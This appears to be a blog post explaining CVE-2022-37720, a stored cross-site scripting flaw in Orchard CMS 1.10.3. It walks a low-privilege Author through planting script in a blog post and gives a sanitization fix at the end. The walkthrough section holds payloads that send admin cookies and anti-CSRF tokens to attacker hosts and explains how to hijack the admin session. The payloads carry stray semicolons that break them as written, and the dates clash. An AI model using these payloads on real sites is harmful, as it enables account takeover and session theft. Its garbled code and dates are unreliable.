In September 2022, a security vulnerability was disclosed for Orchard CMS version 1.10.3, known as CVE-2022-37720. This vulnerability allows attackers with low privileges to inject malicious JavaScript into blog posts, potentially leading to full control over the application's admin accounts. In this post, we’ll break down what CVE-2022-37720 is, how it can be exploited, real code snippets, how to fix it, and links to canonical sources.
What Is Orchard CMS?
Orchard CMS is a popular open-source content management system built on ASP.NET. It’s used for building websites and blogs and allows different types of users: Authors, Publishers, and Admins, each with varying permission levels.
Affected Version: Orchard CMS 1.10.3 (and possibly earlier)
- CVE ID: CVE-2022-37720
The content submitted (such as blog post body) is not properly sanitized.
- If an attacker enters HTML+JavaScript in a post, it gets stored and ends up running in the browser of anyone who views it — including Admins.
This can let an attacker steal admin cookies, perform actions as the admin, or take over the account.
Step-by-Step Exploit Walkthrough
Let’s get practical — you are a user with Author permissions.
Suppose you want to hijack the admin session. You create a new blog post, entering this as the body
<h1>Read This!</h1>
<script>
// Simple example: Steal admin cookies and send them to attacker's server
fetch('https://evil.com/steal?cookie='; + document.cookie);
</script>
Or, to show a simple popup
<script>alert('XSS by Author!');</script>
2. Storing and Triggering
- You save/publish the blog post as usual.
- The post is now live (or pending approval, still visible to Publisher/Admin).
The malicious code executes in the context of the admin's logged-in session.
- The script can steal authentication cookies, perform privilege escalation, or change admin settings on behalf of the admin.
Proof of Concept: Full Account Takeover
Suppose you want to escalate your privileges. Here’s a payload that sends the admin’s anti-CSRF token and session cookie to your server:
<script>
fetch('https://your-attacker-site.com/stealin?cookie='; + document.cookie + '&csrf=' + document.querySelector('input[name="__RequestVerificationToken"]').value);
</script>
Once you have this information, you might forge requests as the admin or reuse the session.
Why Is This Possible?
- Orchard CMS 1.10.3 fails to sanitize HTML/JavaScript submitted by trusted-but-not-admin users (like Authors).
The CMS renders the raw HTML in posts without escaping dangerous tags.
- Unlike modern editors which encode HTML or restrict dangerous elements, 1.10.3 doesn’t — by default.
Any Author or Publisher can become an Admin if they lure an admin into viewing their post.
- Site-wide compromise is possible if admins reuse passwords elsewhere or if sensitive tokens are leaked.
The Official References
- NVD entry for CVE-2022-37720
- GitHub: Orchard CMS
- Exploit details on Source Incite blog (ZDI-22-116)
How to Fix
To protect Orchard CMS, sanitize all user input, especially HTML content in blog posts.
The best way is to upgrade to a newer, supported version.
- If you’re stuck on 1.10.3, consider community patches or mitigations.
2. Use a Sanitization Library
Insert a sanitization step before saving blog post content. For example, using HtmlSanitizer:
var sanitizer = new HtmlSanitizer();
string cleanHtml = sanitizer.Sanitize(request.Body);
// Save cleanHtml instead of raw HTML
Final Thoughts
CVE-2022-37720 is a reminder that “trusted” users should never be able to inject raw HTML and JavaScript unless you’re very sure of them. XSS is dangerous, especially on a platform like Orchard CMS where low-privilege users often create a lot of content.
Want to Learn More?
- OWASP XSS Prevention Cheat Sheet
- Orchard CMS Security Guidelines
*Always sanitize user input, and keep your CMS updated!*
Timeline
Published on: 11/25/2022 16:15:00 UTC
Last modified on: 11/29/2022 22:06:00 UTC